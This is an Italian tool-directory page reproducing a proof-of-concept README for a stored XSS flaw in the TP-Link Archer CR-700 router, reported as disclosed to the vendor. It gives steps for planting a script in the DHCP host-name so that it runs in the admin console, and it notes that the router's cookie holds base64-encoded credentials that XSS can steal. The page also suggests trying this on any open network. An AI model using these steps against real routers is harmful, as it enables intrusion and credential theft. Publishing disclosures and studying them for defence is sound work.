Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
TP-Link-Archer-CR-700-XSS-Exploit — Sfruttamento del router TP-Link Archer CR-700. (Divulgato responsabilmente a TP-Link) | Kitploit
Strumenti/GitHubGitHub/ayushman4/tp-link-archer-cr-700-xss-exploit
Sicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubayushman4/tp-link-archer-cr-700-xss-exploit

TP-Link-Archer-CR-700-XSS-Exploit

Sfruttamento del router TP-Link Archer CR-700. (Divulgato responsabilmente a TP-Link)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
319 anni faNon ancora revisionato

TP-Link-Archer-CR-700-XSS-Exploit

Sfruttamento del router TP-Link Archer CR-700. (Divulgato responsabilmente a TP-Link)

Passaggio 1-> Sulla tua macchina Linux (Kali o Ubuntu) digita il seguente comando

gedit /etc/dhcp/dhclient.conf

Commenta la riga qui sotto #send host-name = gethostname();

Copiala nella riga sottostante e modifica la funzione gethostname() con uno script XSS come quello qui sotto.

send host-name = "<script>alert(5)</script>";

Passaggio 2:Riavvia il tuo sistema Linux affinché le modifiche abbiano effetto.

Passaggio 3: Invia una richiesta DHCP al router per ricevere un indirizzo IP con il comando qui sotto.(Prova su qualsiasi router di rete aperta che utilizzi TP-Link Archer CR-700)

dhclient -v -i wlan0

Eseguendo il comando sopra, viene inviata una richiesta DHCP al router. In una richiesta DHCP, il nome host inviato è quello che abbiamo forzato a essere uno script XSS <script>alert(5)</script>

Passaggio 4: Accedi alla console di amministrazione.

Quando accedi, lo script viene eseguito.

Un altro problema che ho riscontrato nel router è che non c'era alcun token CSRF. Il cookie impostato dal router contiene un nome utente e una password codificati in base64 che possono essere rubati usando uno script XSS.

Nota:Tutte le informazioni di cui sopra sono state divulgate a TP-Link, che ha riprodotto il problema e lo ha inoltrato al proprio team di R&S per risolverlo.

Un URL del prodotto https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W

Scarica lo strumento